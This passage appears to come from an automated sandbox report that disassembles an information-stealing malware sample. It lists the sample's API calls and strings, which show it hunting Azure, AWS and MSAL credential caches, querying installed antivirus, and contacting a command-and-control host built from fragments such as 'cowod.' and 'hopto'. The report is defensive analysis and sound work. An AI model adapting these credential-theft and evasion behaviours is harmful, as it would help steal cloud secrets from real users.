                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                    • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                    • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                  • _memset.LIBCMT ref: 00416556
                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                    • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                    • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                    • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                    • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                  • _memset.LIBCMT ref: 004165CA
                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                                                  • _memset.LIBCMT ref: 0041663E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                  • API String ID: 780282842-974132213
                                                                                                                  • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                  • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                                                  • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                  • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                                                  Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                                                  • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                                                  • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1956182324-0
                                                                                                                  • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                  • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                                  • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                  • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                                  Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                    • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                    • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                                  • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                                    • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                    • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                    • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                                    • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                                                    • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                    • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                    • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                                    • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                                    • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                    • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                    • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                                    • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                    • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                    • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                    • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                    • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                    • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                  • String ID: .exe$.exe$2ee1445fc63bc20d0e7966867b13e0e1$_DEBUG.zip$cowod.$hopto$http://$org
                                                                                                                  • API String ID: 305159127-2219833542
                                                                                                                  • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                  • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                                  • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                  • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                                  Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strtok_s.MSVCRT ref: 004135EA
                                                                                                                  • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                                    • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                    • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                                  • strtok_s.MSVCRT ref: 0041398F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                  • String ID: false$true
                                                                                                                  • API String ID: 2116072422-2658103896
                                                                                                                  • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                  • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                                  • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                  • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                                  Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                  • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                  • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                  • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                  • String ID: GET$\xA
                                                                                                                  • API String ID: 442264750-571280152
                                                                                                                  • Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                  • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                                                  • Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                  • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                                  Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                  • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                    • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                                    • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                  • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                  • API String ID: 4288110179-315474579
                                                                                                                  • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                  • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                                                  • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                  • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                                                  Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 004012A7
                                                                                                                  • _memset.LIBCMT ref: 004012B6
                                                                                                                  • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                  • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                  • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                  • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                  • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
